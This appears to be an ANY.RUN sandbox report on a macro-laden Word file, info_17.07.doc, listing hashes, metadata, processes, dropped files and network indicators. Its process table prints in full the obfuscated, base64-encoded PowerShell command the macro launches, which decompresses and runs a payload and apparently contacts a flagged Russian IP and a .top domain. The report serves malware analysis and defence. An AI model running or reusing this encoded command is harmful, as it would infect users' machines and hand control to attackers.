analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

info_17.07.doc

Full analysis: https://app.any.run/tasks/00af5792-0b0e-4e86-a039-83c3723a6902
Verdict: Malicious activity
Analysis date: July 18, 2019, 08:42:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: bouvshbfoetujplmjwdjeveegg, Subject: psehibgn, Comments: cekuempensxooocqazofkqomb, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Tue Jul 16 21:40:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

8E5671D85F40E7B702F8356263176692

SHA1:

E9B2EEA92C98D635EA1A54CBEB8B806EF372ED63

SHA256:

BEC9D6A7B6F5FBEE6F42BEF667DA76B9C7462FDDE67A158CF94E5A231EA71EE2

SSDEEP:

1536:3WN8H6yzqabZh12Kk5QmrXX4qoT5yoLL:GNNy7M3P4xl3v

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3528)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3528)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2268)

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3528)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3528)

    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 3528)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3528)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: bouvshbfoetujplmjwdjeveegg
Subject: psehibgn
Author: -
Keywords: -
Comments: cekuempensxooocqazofkqomb
Template: Normal
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:04:25 21:21:00
ModifyDate: 2019:07:16 20:40:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Manager: -
Company: -
Bytes: 22528
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • bouvshbfoetujplmjwdjeveegg
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3528"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\info_17.07.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2268"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAZgBUADQATQB3AEYATQBYAGYAVABmAHcATwBmAGMAQQBVAE0AbABlAHkAaQBkAGsARwBJAGMAYQBNAFoAVQBFAG4AbQAvAHMAVABUAE4AUgBrAEgAUwB0AFEATABiAFMAaAAzAFIAaQBTAGYAWABjAHgAMgBkAFMAWABlADEALwBPAHUAZgBmADgAagB1AFoAWAB2AHMAQwBQAEMAKwBBAEMARwBBAGYAUABEADAALwBRADAAVgBhAGkARgBHAEgAbwBhAGkAVABmADIAegB0AEoAQwBsAEgAdwBtAEQATABTAGcAbQArAHcAcABaADMAMABMAFkAagBJAGcAVABSAGkAYgBzAFcARAAxAGQAWgBGAE8AcwB4AGgAQwA1AEsAeQB6AFoAdQAxACsAUwBDAFIAZwBnAFkASQB5AEgAcQA1AFIAaQBIAFoAcgBJAGMAVABTAG8ASwBsAG8AKwAxADMAYwAyADkANgAvAHoAVgAwAFkAYQBxAFUAcwBFADAAegBqAG4AQgBXAE0AVQBiAG8AcABzAEEAcAB6AFoARABpAHcAcABSAFYAeQBjADAANAA0AGIAeABFAEkAaABWADMAegBOADAAZQBJAG8AYQBsADcASwBIAGsAdwBDAEMAUwBnAGwARwBsAHcAeQB0AG8ATwBEAEUAdgBDAEkANQBTAFgAZgBOAG4ASQByAE0AQwBHAGcASwBhAGcAOQA4AG4AUgBxADIASwBxAGoANQBGAFIAQgA0AHYAQQA4AGEAeABGAC8AdABzADkARwBlADQAQgBpAGQAZQB3AC8ARgBqAG8ATwBzAE4AeQBKAGkAbwB0AHQAOQBRAEsATgBLAE0AcgBNAEUANABLAHgAQQBiAEIAVwBPAFYAZwBuAFoAQwBRAEgAZgBRADYAeABtAGcAZgB2AFUAbwBUAG4ASQB1AEYAWQAwAGsAbQBoAFUAOABJAGwASwArADIALwBaAGkAaQBlAGQASwAvADcAMgA4AGEAVgBKACsATwBzAGQAagBoAEYAVwBVADEAcwBlAGoAQQAvAHoAUgBpAC8ANAB2AFcARAA2AFoAWQBtACsAaABDAGoAOQBQADkASABNAHoAbgBmADQAdAA2AGcAeAB1AFUATQBmAHEAbwBLADcAVgBOAHgAUAA1ADAAdwBZADAARABPAGYAeQA0AGgAcwA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBlAHMAcwBJAE8ATgBNAE8ARABFAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAEUAQQBEAEUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEAZAB0AG8AZQBuAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcARQAnACAAKwAgACcAWAAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
16 935
Read events
7 597
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRCFE2.tmp.cvr
MD5:
SHA256:
2268powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HPVZXD6MB6788FVFW7VM.temp
MD5:
SHA256:
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\query[1].asmx
MD5:
SHA256:
2268powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17dc46.TMPbinary
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB
SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95
2268powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB
SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.xmlxml
MD5:C47D7E084E6F3BA625EE5FB4B0C98782
SHA256:AA57BB0BEF0DEDCFA0703E398637DD38B3B927CAC4A1D65122903F1FAB2B7C9C
3528WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:ED3EB052209D6630320BDB3771A7238C
SHA256:074B3392AD68C30AE61F651A7B98F81EB63506B6AE032A6C86D1171260F0C192
3528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:DDC866F1C9D803F0C5835B1DB0B0F942
SHA256:4A94D0182BCF86D7CAAE503CBBE431CEE321B5CEC4B8B65E4C3B8AA1FE67AAF2
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.sigbinary
MD5:63BEDF9BA0F42C772DD2731CEF84612B
SHA256:8E26E4A1E3CC27FC2EF8D556D4AF904B86BADB59C382000AFF08598606084999
3528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$fo_17.07.docpgc
MD5:A1FC8D318BD68EA466FB00442DB333BC
SHA256:80EEAC442498C07E266C43C24F8B93441924F8020A630904517687137A357B7A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3528
WINWORD.EXE
GET
200
52.109.32.27:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023
GB
xml
1.99 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2268
powershell.exe
185.193.141.248:80
IT Mir LLC
RU
suspicious
3528
WINWORD.EXE
52.109.120.29:443
rr.office.microsoft.com
Microsoft Corporation
HK
whitelisted
3528
WINWORD.EXE
52.109.32.27:80
office14client.microsoft.com
Microsoft Corporation
GB
whitelisted

DNS requests

Domain
IP
Reputation
fcamylleibrahim.top
malicious
dns.msftncsi.com
  • 131.107.255.255
shared
office14client.microsoft.com
  • 52.109.32.27
whitelisted
rr.office.microsoft.com
  • 52.109.120.29
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
info_17.07.doc